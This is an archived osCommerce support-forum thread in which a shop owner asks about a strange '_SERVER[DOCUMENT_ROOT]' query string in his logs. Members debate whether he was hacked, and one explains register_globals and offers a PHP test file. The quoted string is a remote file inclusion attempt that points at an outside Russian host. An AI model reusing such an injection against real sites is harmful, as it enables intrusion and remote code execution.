Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

Can any one tell me what is this for //?_SERVER[DOCUMENT_ROOT]=http://www.hostmann-steinberg.ru/x?

rocdy

By rocdy
in General Support

Recommended Posts

rocdy

rocdy

Posted
Posted

Can any one tell me what is this for //?_SERVER[DOCUMENT_ROOT]=http://www.hostmann-steinberg.ru/x?

 

I found it's in my Who Is Online URL. Some one put that url several time in my site when open my index page and category page.

 

Are that is some hack?

Rocdy

 

Beginner in php programming and still learning from this forums.

Special thanks for Oscommerce Community Forums that help me a lot. :-)

FIMBLE

FIMBLE

Posted
Posted

Hi

look over your page source to see if there is any unexpeted links, or code.

check some php files to see if any code has been added, i would not think there was, it seems someone testing rather than actaully in.

check your server error logs to see the recent errors.

What is your URL i will have a look over your source code.

 

Nic

 

 

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

rocdy

rocdy

Posted
  • Author
Posted

Hi

look over your page source to see if there is any unexpeted links, or code.

check some php files to see if any code has been added, i would not think there was, it seems someone testing rather than actaully in.

check your server error logs to see the recent errors.

What is your URL i will have a look over your source code.

 

Nic

 

my site is www.bnetb-tanahabang.com

 

I have already install site monitor,htacc protection, IP Trap, saver database input, and security pro.

I have checked with site monitor and it's change nothing in my file.

 

It's appear since this morning (in my country), after several minute it's came again and again.

 

I have already check my php file in root directory, nothing change. maybe on out side there someone just want to try playing around with my website.

Rocdy

 

Beginner in php programming and still learning from this forums.

Special thanks for Oscommerce Community Forums that help me a lot. :-)

FIMBLE

FIMBLE

Posted
Posted

Your source looks ok, next time you see them trying this grab the IP number and add it to your banned?IP+Trapped.txt file.

They wont be able to bother you with that IP number again.

I seriously doubt you have been ahcked as was mentioned in an earlier post, i think it was confused with the eval decode hack going around.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

andy_1984

andy_1984

Posted
Posted

You have been hacked.

 

If you know what you're looking for, clean all files. Preferably, delete your site files and restore from a clean backup.

 

Read and apply security fixes.

 

How to Secure your site

Securing Admin

 

Also, delete "File_Manager.php" from admin.

 

and your diagnosis is based on what exactly ???

 

explanation would be nice as you obviously seem to know hes been hacked so you must have some prior knowledge regarding this server_root thing

 

which btw was also asked about yesterday on here and you would also know that applying oscommerce security will do sweet nothing as its php problem...that is if this server_root thing even is a problem and not just some random mistake or error

 

see here http://www.oscommerce.com/forums/topic/346894-need-advice-for-some-weird-last-url-in-who-is-online/

 

the conclusion is that if register globals is turned off there isnt a problem. so you must know register globals is on and the site got hacked because its so damn obvious.

 

sorry buddy i know you have been a member here for a few years but that was god awful advice and to be honest possibly scaring the crap out of a member

 

rocyd check and see if register globals is on.

 

check the url at the end of that server_root thing did you replace what ever was at x?

 

i would be interested to know as it appears, and i repeat "Appears" to be used for executing malicious code via vulnerability in php 4.2 and lower

 

if we know that what ever it is trying to execute it would be the first place to start looking for any problems, as i said nothing to do with oscommerce its php.

 

if register globals is off i wouldnt worry too much but for your own piece of mind read about this exploit and investigate what the url is trying to do.

FIMBLE

FIMBLE

Posted
Posted

Hi Andrew

I think that BryceJR got confused between the Eval decode64 hack going around, possibly sped read the post, his answers are usually of a high standard.

This time im sure he made an error, which all of us do.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

rocdy

rocdy

Posted
  • Author
Posted

Your source looks ok, next time you see them trying this grab the IP number and add it to your banned?IP+Trapped.txt file.

They wont be able to bother you with that IP number again.

I seriously doubt you have been ahcked as was mentioned in an earlier post, i think it was confused with the eval decode hack going around.

Nic

 

Thanks for the reply. I will do what you tell me to prevent that IP come again.

 

Thanks for all of you that give me some information about this hack.

 

Best regard.

Rocdy

Rocdy

 

Beginner in php programming and still learning from this forums.

Special thanks for Oscommerce Community Forums that help me a lot. :-)

BryceJr

BryceJr

Posted
Posted

@rocdy: I'm glad you were able to sort things out.

 

@andy_1984: My apologies, I didn't mean to get you all upset.

and your diagnosis is based on what exactly ???

The answer is:

Some one put that url several time in my site when open my index page and category page.
If rocdy did not do it, who could it be? Tooth fairy? Harry Potter?

 

explanation would be nice as you obviously seem to know hes been hacked so you must have some prior knowledge regarding this server_root thing
No, not really. I don't have any explanation. I'm working on information given on the original post. Anything after that is hindsight.

 

sorry buddy i know you have been a member here for a few years but that was god awful advice and to be honest possibly scaring the crap out of a member
Getting hacked is a bad thing. Cleaning up after a hack is very tedious, especially if a clean backup doesn't exist. "What?! You want me to start over from scratch?!" Now, that's scary.

 

@Nick: Yes, I did suspect "Eval decode64" hack. It was a possibility. There have been numerous posts on that hack for the past several weeks.

FWR Media

♥FWR Media

Posted
Posted

Can any one tell me what is this for //?_SERVER[DOCUMENT_ROOT]=http://www.hostmann-steinberg.ru/x?

 

I found it's in my Who Is Online URL. Some one put that url several time in my site when open my index page and category page.

 

Are that is some hack?

 

This looks to me like a script kiddie taking his chances at injecting a bad uri into the $_SERVER['DOCUMENT_ROOT'] predefined variable.

 

This doesn't mean you have been successfully hacked it just means that someone or something was trying.

 

This injection technique has obviously worked historically because I have seen examples of it on the web, usually related to register_globals being on and perhaps with extract being used wrongly in the script. However, my tests on later versions of PHP4.4.X and PHP 5.X show this method not to work so perhaps it was just earlier versions of PHP.

 

You could try the following if you are concerned, save the following file in your shop root as doc_root.php.

 

Then access the file using <my web address>/doc_root.php?_SERVER[DOCUMENT_ROOT]=http://www.mysite.com

 

If the two print outs contain your site path and not http://www.mysite.com then you seem to be safe from this particular technique.

 

<?php
 include_once 'includes/application_top.php';

 echo '$_SERVER[\'DOCUMENT_ROOT\'] = ' . $_SERVER['DOCUMENT_ROOT'] . '<br />' . PHP_EOL;
 echo '$DOCUMENT_ROOT = ' . $DOCUMENT_ROOT . '<br />' . PHP_EOL;

 include_once 'includes/application_bottom.php';
?>

DELETE THE FILE AFTER USE IT IS A VULNERABILITY

Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls

 

KissMT Dynamic SEO Meta & Canonical Header Tags

 

KissER Error Handling and Debugging

 

KissIT Image Thumbnailer

 

Security Pro - Querystring protection against hackers ( a KISS contribution )

 

If you found my post useful please click the "Like This" button to the right.

Please only PM me for paid work.

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...